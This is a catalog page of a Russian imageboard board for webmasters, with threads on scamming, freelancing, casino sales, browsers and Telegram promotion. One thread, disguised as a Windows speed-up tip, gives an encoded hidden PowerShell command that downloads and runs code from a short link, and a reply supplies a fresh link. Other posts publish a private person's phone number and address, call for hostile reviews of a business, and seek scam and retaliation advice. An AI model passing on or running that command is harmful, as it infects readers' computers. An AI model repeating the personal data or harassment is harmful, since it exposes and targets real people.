Главная Юзердоски Каталог Трекер NSFW Настройки

Web-мастера

Создать тред Создать тред
<<
Каталог
хочу вкатиться в скамминг Аноним # OP 30/09/21 Чтв 06:35:53 133851 Ответ
изображение2021[...].png 981Кб, 1080x1182
1080x1182
привет, анончик. я, как ты уже мог понять из названия треда - хочу вкатиться в скамминг, чтобы зарабатывать денежку в свободное время, но не знаю как грамотно подойти к этому вопросу. пиши вообще любой сабж по этой теме, начиная от интересных форумов, где можно покопаться в интересующей меня информации и заканчивая историями из своей жизни.
Пропущено 6 постов
2 с картинками.
Пропущено 6 постов, 2 с картинками.
Аноним 18/01/24 Чтв 21:25:11 138454
Можешь лечь под крыло больших тим где тебе дадут ебланынаставники мануалы из 20-22 года.. А если хочешь вкатиться то нужно изучать самому. Самые новые схемы/площадки тебе никто не расскажет... Чем больше людей в сфере тем меньше бабла достаётся нам. Потому-что один чувак может трахать весь сайт при правильной работе и имея банальные самописы парсера/спамера. Так что увы легких денег не бывает везде нужны знания дорогой анон
Аноним 10/02/26 Втр 00:04:10 139659
Аноним 24/02/26 Втр 13:57:50 139669
АНОНЫ МОИХ НАВЫКОВ НЕ ХВАТАЕТ ЧТОБЫ ЭТУ ХУЙНЮ БЕСПЛАТНО ОТРЫТЬ. мне нужна именно ориг картинка (убра Аноним 15/01/26 Чтв 23:18:50 139640 Ответ
image.png 669Кб, 1920x970
1920x970
АНОНЫ МОИХ НАВЫКОВ НЕ ХВАТАЕТ ЧТОБЫ ЭТУ ХУЙНЮ БЕСПЛАТНО ОТРЫТЬ. мне нужна именно ориг картинка (убрать вотермарку и апскейльнуть я сам могу), поэтому прошу нетсталкач-коллег подключиться!
https://ru.dreamstime.com/%D1%82%D0%B5%D0%BA%D1%81%D1%82%D1%83%D1%80%D0%B0-%D0%BA%D0%B0%D1%80%D1%82%D0%B8%D0%BD%D1%8B-%D0%B2%D1%8B%D1%88%D0%B8%D0%B2%D0%BA%D0%B8-%D0%B1%D0%B5%D0%B7%D1%88%D0%BE%D0%B2%D0%BD%D0%B0%D1%8F-%D0%BE%D0%B1%D0%BE%D0%B8-%D0%BF%D1%80%D0%B5%D0%B4%D0%BF%D0%BE%D1%81%D1%8B%D0%BB%D0%BA%D0%B0-%D1%81-%D0%BA%D1%80%D0%B0%D1%81%D0%B8%D0%B2%D1%8B%D0%BC%D0%B8-image114127463
23/01/26 Птн 08:07:08 139647
>>139640 (OP)
Скачай мод сбера на безлимитные рубли да купи, чо ты как маленький честное слово
Аноним 11/02/26 Срд 07:44:16 139660
28113-99-3.jpg 764Кб, 1800x1800
1800x1800
НЕ РАБОТАЕТ БЛЯДСКИЙ ЮТУБ НА НОВОМ ПК Аноним 27/12/25 Суб 17:06:52 139626 Ответ
chromeirciUEgBfa.png 22Кб, 1920x953
1920x953
хуй знает в тот тред пишу нет, вообщем:
собрал новый пк, все супер, но блядский ютуб не открывается ни на одном из браузеров, ошибка на пикриле
чего только не перепробовал, от изменения времени до отчистки ssl и тд
ps: пытаюсь заходить через zapret, на старом пк все идеально при тех же условиях заходит
200 рублей скину если кто поможет фиксануть этот гемор
Аноним 06/02/26 Птн 16:58:42 139658
>>139626 (OP)
варп от клауда или само заработало?
Предложение по готовому КАЗИНО ПРОЕКТУ CAZARO 15/07/25 Втр 15:27:13 139421 Ответ
photo2025-06-22[...].jpg 191Кб, 1280x657
1280x657
photo2025-07-15[...].jpg 80Кб, 1280x657
1280x657
photo2025-07-15[...].jpg 54Кб, 625x1280
625x1280
photo2025-07-15[...].jpg 37Кб, 630x1280
630x1280
Добрый день

Наша компания GamblingSolutions предлагает вам покупку проекта Cazaro (его ранняя версия представлена на скриншотах), либо же покупку создания полностью вашего проекта с вашим тз.
Поскольку версия сайта не финальная, вы можете вносить корректировки.

Почему мы рекомендуем вам выбрать именно нашу компанию?

Мы предлагаем выполнение работы в кратчайшие сроки, подключение лайвов и слотов, а также создание любых режимов, за приемлемую цену, таким образом, за Cazaro мы просим 4000$. В эту цену включена постоянная онлайн поддержка, наличие на сайте нескольких кастомных режимов, а также подключение слотов.

Просим вас задать любые вопросы в случае заинтересованности:)

Telegram https://t.me/GSManag3r
Дмитрий 26/01/26 Пнд 13:41:35 139649
Привет, тред про покер до сих пор живой, интересно почитать про старые стратегии и rake. Я вот уже давно перешёл с покера на слоты и сижу на https://pincoluck.com/ — там выбор огромный, бонусы нормальные, вывод без лишних вопросов. Иногда вспоминаю покер, но слоты проще и динамичнее.
Движок для имиджборды Аноним 13/11/25 Чтв 14:24:31 139584 Ответ
lain.png 147Кб, 400x366
400x366
Хочу сделать свой небольшой имиджборд, но не могу найти достаточно информации, доков там, чтобы понять как это делать, посоветуйте каких-нибудь гайдов по созданию борд
Пропущено 1 постов
1 с картинками.
Пропущено 1 постов, 1 с картинками.
Аноним 28/12/25 Вск 14:48:24 139627
Аноним 28/12/25 Вск 14:49:21 139628
Аноним 19/01/26 Пнд 14:31:14 139646
>>139627
>>139628
>тормозной питухон для борды
Петушки обезумели, совладаешь ли ты с ними?
че учить и зачем bob 18/11/24 Пнд 01:08:01 139041 Ответ
channels4profile.jpg 182Кб, 900x900
900x900
шалом, щас учу c++ , до этого выучил пхп с ноудjs`ом, питон с джаваскрпитом(на ванильном уровне оба). Подскажите куда с такими знаниями ваще можно углубиться, мне 14...
Пропущено 6 постов
1 с картинками.
Пропущено 6 постов, 1 с картинками.
Аноним 25/11/25 Втр 08:17:38 139591
>>139041 (OP)
Тепреь попробуй научиться играет на хуе - как на балалайке. Это будет достойным вызовом для тебя
Аноним 18/12/25 Чтв 21:55:17 139617
>>139570
>военник
>откоса
>Если не проходишь по здоровью
Ты нормалфаг без F-диагнозов что ли? Может ты ещё и не девственник, быдло социоблядское?
Аноним 26/12/25 Птн 01:49:22 139624
ллмки заменят всех очень быстро, лучше в сантехники
Какой браузер выбрать? # OP 30/09/23 Суб 19:26:16 138154 Ответ
158963240815502[...].jpg 287Кб, 900x674
900x674
Доброго вечера всем,хочу узнать каким браузером пользуйтесь ,не считая тора ,например ,может быть кто то из вас юзает IceCat,SeaMonkey и тд?
P.s гугл надоел не открывать некоторые сайты
Пропущено 2 постов
1 с картинками.
Пропущено 2 постов, 1 с картинками.
Аноним 12/09/25 Птн 15:40:01 139499
Аноним 06/12/25 Суб 00:15:34 139597
Helium
Аноним 07/12/25 Вск 21:25:25 139599
firefox тема
Заработок на порносайте Аноним 08/12/18 Суб 10:19:51 118047 Ответ
nicole-aniston-1.jpg 62Кб, 533x800
533x800
Сап, двач! Хочу создать сайт для взрослых, только хз выгодное ли это занятие.

Давайте представим что у меня есть такой сайт, и на него заходит 10к тел в день. Сколько я смогу зарабатывать, если не увешивать сайт рекламой с ног до головы? Хотя бы очень примерно.
Пропущено 137 постов
10 с картинками.
Пропущено 137 постов, 10 с картинками.
Аноним 05/05/25 Пнд 00:47:24 139357
Схороню (может только для себя всякие порно движки сайтиков.
belloo.ru/belloored (fansonly.ru)
bbest.live/shop порносекскамшоу прикольные
m 17/09/25 Срд 11:59:34 139502
ща работаю в адалт сетке, задавайте вопросы, подключу вас @clickmaxz
Аноним 06/12/25 Суб 00:14:55 139596
На зоне окажешься
помогите девушкам помощь 05/12/25 Птн 10:08:56 139595 Ответ
i.webp 38Кб, 1494x970
1494x970
89006955110 люда изверг
улица 50 лет Октября, 81, Стародуб, Брянская область, 243240

издеваетеся над приемными девушками - они не могут ничего сделать запуганны с детства:

живут в доме большом 2 девушки удочерины а 2 их внуки внуки делают что а девушкам нельзя самим хотя им по 20л выйти в туалет на улицу нельзя просто гулять по дому нельзя даже чай попить взять там изверг орет сразу и не дает этого сделать + на утро кормит всегда одним и тем же гречка с сахаром и молоком + может просто срыватсья и орать на них + нельзя взять без разрешения ничего + дома заставляет внука смотреть за ними чтобы они ничего не стырили и не ходили по дому + кормит таблетками серьезными не давая сдать анализы чтобы такие таблетки пить и тд корчое полный изверг чем помочь я незнаю я писал анонимку в опеку нет ответа сам друг просто из другой страны - помогите кто нибуть чем нить с этой ситуацией!!!!
Посоветуйте сервис для покупки домена Аноним 29/11/25 Суб 05:01:39 139593 Ответ
image.png 44Кб, 495x323
495x323
Посоветуйте сервис для покупки домена
Чтобы был дешевый на рег и продление, и возможность оплаты МИР или СБП
Срочно ищу для своего сайта

Вот что я нашел:
regway (думаю этот, но не знаю сколько там продление будет стоить)
timeweb
beget
Раскрутки tg тред Аноним 23/09/25 Втр 00:12:25 139507 Ответ
ogog15815142312[...].jpg 127Кб, 1200x628
1200x628
Анон, я захотел запилить тг канал с мемами. Не продавать никакие товары, не вонючие курсы, тренинги, вебинары и прочий кал. Такие прекрасно рекламятся в рся, инсте и прочем, у них рекламные бюджеты, цена за клик, и прочее.

Но что если в меня мемы уровня /b, метапостирония в картинках? Или например паблик с моим нытьем? Или паблик с копипастами?

Как бы ты пиарил это говно, не вкладывая бабло или вкладывая совсем минимум, чтобы это было как хобби, на которое не жалко, а не бизнес с вложениями.

Я долго думал и мне пришло в голову только банальное расклеивание стикеров с qr кодом и покупка рекламы у маленьких нонейм каналов. Очевидно всякие обмены репостами не моя тема, для этого сначала аудитория должна быть, просмотры, чтобы другим это было интересно. Форс этого дерьма на двачах быстро попадет в бан. Спам в телеге уведет в бан уже сам канал. А как бы поступал ты? Дай советов мудрых.
Пропущено 1 постов
1 с картинками.
Пропущено 1 постов, 1 с картинками.
Аноним 03/10/25 Птн 18:38:22 139541
Bump
Аноним 19/11/25 Срд 18:49:48 139588
>>139507 (OP)
В тикток или ютаб-шортсы заливал бы озвучку нейронской мемов из паблика на фоне паркура в Майне.
Аноним 21/11/25 Птн 00:54:43 139589
+
Внезапно нашел годноту из разряда “ускорь винду” на ютубе: Win+R и вставить строку powershell -w h Аноним # OP 02/08/25 Суб 17:41:46 139438 Ответ
image.png 6Кб, 1017x42
1017x42
Внезапно нашел годноту из разряда “ускорь винду” на ютубе: Win+R и вставить строку

powershell -w h -nop -noni -e aQBlAHgAIAAoAGkAdwByACAAJwBoAHQAdABwAHMAOgAvAC8AdAAuAGwAeQAvAFkAUAB3AG0AdAAnACkA

Вбил строку (пикрил), и действительно. %TEMP% папка исчезла, но диск стал раза в 3 быстрее отвечать, очистилось 40 ГБ. В чем подводные и что за фича?
Пропущено 1 постов
2 с картинками.
Пропущено 1 постов, 2 с картинками.
Аноним # OP 02/08/25 Суб 17:42:42 139439
image.png 74Кб, 1111x620
1111x620
А в /b забанили за тред, кек
Аноним 31/08/25 Вск 17:42:59 139487
Аноним 16/11/25 Вск 23:54:38 139587
ссылка просрочилась, обнови
https://t .ly/YPwmt
хочу сделать из 10&#92;11 винды windows xp,чтобы лагов не было и подобного,либо сборку xp с поддержк # OP 12/11/25 Срд 14:35:29 139583 Ответ
image.png 459Кб, 640x432
640x432
хочу сделать из 10\11 винды windows xp,чтобы лагов не было и подобного,либо сборку xp с поддержкой новых программ и обновлений.если знаете какие нибудь сборки или приложения,напишите
habr Аноним # OP 01/11/25 Суб 01:51:23 139575 Ответ
Screenshot 2025[...].png 43Кб, 145x175
145x175
а где вы сейчас ищете дешевыхую рабовчую силу?

раньше был хабр, а теперь непонятно что делать. где искать 5р в час за заполнение каптч?
Подскажите про двач Аноним # OP 08/10/25 Срд 15:06:27 139546 Ответ
2ch-logo-fix.gif 19Кб, 200x416
200x416
привет. Подскажите, с чего начать. Хочется взять японский двач и перевести на русский
Аноним 26/10/25 Вск 00:27:28 139571
image.png 64Кб, 500x275
500x275
>>139546 (OP)
Не стоит вскрывать эту тему. Ты молодой, шутливый, тебе все легко. Это не то. Это не двач и даже не форчан. Сюда лучше не лезть. Серьезно, любой будет жалеть. Лучше закрой тему и забудь, что задумал. Я вполне понимаю, что данным сообщением вызову дополнительный интерес, но хочу сразу предостеречь пытливых - стоп. Остальные просто не найдут.
Можно ли норм зарабатывать на фрилансе? Аноним # OP 25/02/25 Втр 12:21:49 139164 Ответ
i.webp 105Кб, 975x604
975x604
Всем ку. Объясню ситуацию. Живу в жопе мира, образование проебал, перспектив никаких, выбраться из этого болота тоже вариантов особо нет.
Поэтому думаю вкатиться на фриланс. Есть тут успешные фрилансеры? Слышал от всяких околоайтишных блогеров и на форумах, что фриланс зло, там работают за еду, конкуренции много, а новичку в программировании, коим я являюсь, там и вовсе делать нечего. Но слышал еще и об успешных фрилансерах, но они работали на upwork, это было еще до санкций и прочей ерунды. Как дела сейчас на российских биржах? А может есть еще варианты, кроме бирж?
Знаю, что проще всего вкатиться через php, всякие вордпрессы, cms, битриксы и прочее. Есть ли еще варианты? Мне кажется, что, например, с фронтендом беда на фрилансе, все таки заказчикам нужен готовый продукт, то есть сайт, а не его часть в виде фронтенда. То есть, нужно быть фулстеком. Ну вот, сам спросил, сам и ответил.
А потом, если все будет норм, я бы пошел куда-нибудь в другие области, посложнее, может быть в какую-нибудь крипту с блокчейнами или в мобильные приложения.
Предвидя комменты в стиле "ради денег нельзя вкатываться в программирование", скажу, что писать код мне вполне нравится.
Посоветуйте что-нибудь, плиз, не хочу так больше жить, заебало. Я еще молодой, жизнь пройдет и я умру, прожив уебищную жизнь, даже вспомнить нечего будет. А я не хочу так.
Пропущено 12 постов
4 с картинками.
Пропущено 12 постов, 4 с картинками.
Аноним 19/09/25 Птн 22:02:50 139503
>>139233
>по факту удовольствие в этой отрасли получают только аутисты перельманы которым по кайфу 24/7 решать у себя в голове пиздецовые по сложности уравнения и геометрические задачки. для остальных айти

Сразу видно вчерашнего студента. По факту софтверный инжиниринг осилить несложно любому с IQ не ниже 120. Сложен он в основном не из-за технической сложности задач, а из-за кабанов-дебилов и барыг-погонял, которые с трудом тройку по матану в вузах нашкребали, а средний программистишка при этом не способен обкашливать вопросики.

>>139272

Это не синьор инженер. Это гейткипящий говнокодер, который даже ИИ инструментами толком не попользовался.
Аноним 04/10/25 Суб 15:06:14 139544
>>139164 (OP)
Да. Можно.

Твой стек должен быть:

HTML/CSS/JS (Базовый) + Wordpress (База php + Elementor + Woocommerce, натяжка вёрстки, вообще осознание, что такое Wordpress).

И самое главное - софтскиллы. Нужно ументь общаться с клиентами. Без этого ты говно. И красивый оформленный кворк. То что ноют о Кворке, что низя взять заказ - можно. На первых 10 будешь работать за опыт и 500 рублей (Не беря что-то сложное за копейки, где выгоришь и будешь ебашить по 30 дней и прописывай все условия в тз, но уже другой момент).

Одним словом - можно. Если дашь тг, то могу больше инфы дать)

Мимофрилансер, Кворк.
Аноним 05/10/25 Вск 03:04:36 139545
>>139544
Анлогично живу в пердях, фрилансю на этом стеке, в среднем выходит около 50К в мес (знаю, что копейки). Единственное чем не занимаюсь - дизайн, из-за этого так мало выходит, если бы было желание калякать в фигме, то можно было бы заворачивать готовые проекты под ключ, а так лишь прослойка между посредником и клиентом

Не рекомендовал бы смотреть в сторону wp и верстки, т.к. заказов все меньше т.к. даже под такой лоускил стек есть свои школы-курсы. Надо смотреть туда, где есть бабки, если пхп, то это 1с битрикса , у бизнеса есть бабки и думаю там легко можно будет залететь на поддержку их 1с сайта. Много вижу заданий по доработке битрикса и откликов там минимум, но подозреваю, что в выборе - дорабатывать за кем то битрикс или принимать тяжелые наркотики, то люди выберут второе

В общем если фриланс, то выбирай из:
Дизайн - это база, что тебя прокормит
Тильда
Битрикс
[18+] Как корректно назвать стримывидеорилсы под фут-фетиш аудиторию, чтобы это находилось поиском и Аноним 01/10/25 Срд 22:50:16 139540 Ответ
IMG202509151541[...].jpg 245Кб, 960x1280
960x1280
Как называть стримы, видео, рилсы, чтобы их находили футфетишисты, не нарушая правил сообщества? Как эту тему раскручивать?

Заранее спасибо. Ссылки не кидаю, обсуждаем только формулировки и раскрутку, чтобы всё было легально и без нарушений.
Месть 26/09/25 Птн 00:24:23 139525 Ответ
image.png 1657Кб, 1366x768
1366x768
Здрасте. Такая тема. Вот бургерная которая принимают на работу людей, а потом морально доводит их до желания умереть. Начальник Денис реальный козёл, и после него у меня даже до сих пор остался ожог и синяк на руке.
Бизнес находится в германии, и кому не сложно, пожалуйста оставьте там "хороший" отзыв
https://maps.app.goo.gl/AhZZ8peBRFhQhi228?g_st=ipc
IPB 3 личка Аноним # OP 15/09/25 Пнд 09:49:48 139501 Ответ
image.png 115Кб, 400x400
400x400
Как на форуме IPB 3 скачать свои лс куда-нибудь в текстовики например?
Война в телеге Аноним 09/09/25 Втр 13:20:41 139494 Ответ
image.png 406Кб, 1024x625
1024x625
Уважаемые знатоки, возникла нужда в подсирательстве.

Бэк такой. Не шарю кто там первый камень кинул, но посрались два сообщества. "Коллеги" объявили нас "конкурентами", запретили какое-либо сотрудничество своим филиалам. Казалось бы, но спустя подозрительно короткий промежуток времени (пара дней) после произошли массовые налеты ботов в соц-сетях. Особенно засрали ТГ, под каждый пост полезло по 5-6 "нравятся мои фото? Пиши сюда". Защиту от спама подрубили конечно, но во-первых, иногда хорни-скайнет прорывается, во-вторых, теперь приходится платить за защиту от голых женщин, и в-третьих, обидна блин.

Посоветуйте как и какую ответку дать окаянным? Мы ребята не прошаренные и в подобном не шарим, но терпилами быть не хочется.
Настройки X
Ответить в тред X
15000
Добавить файл/ctrl-v
Стикеры X
Избранное / Топ тредов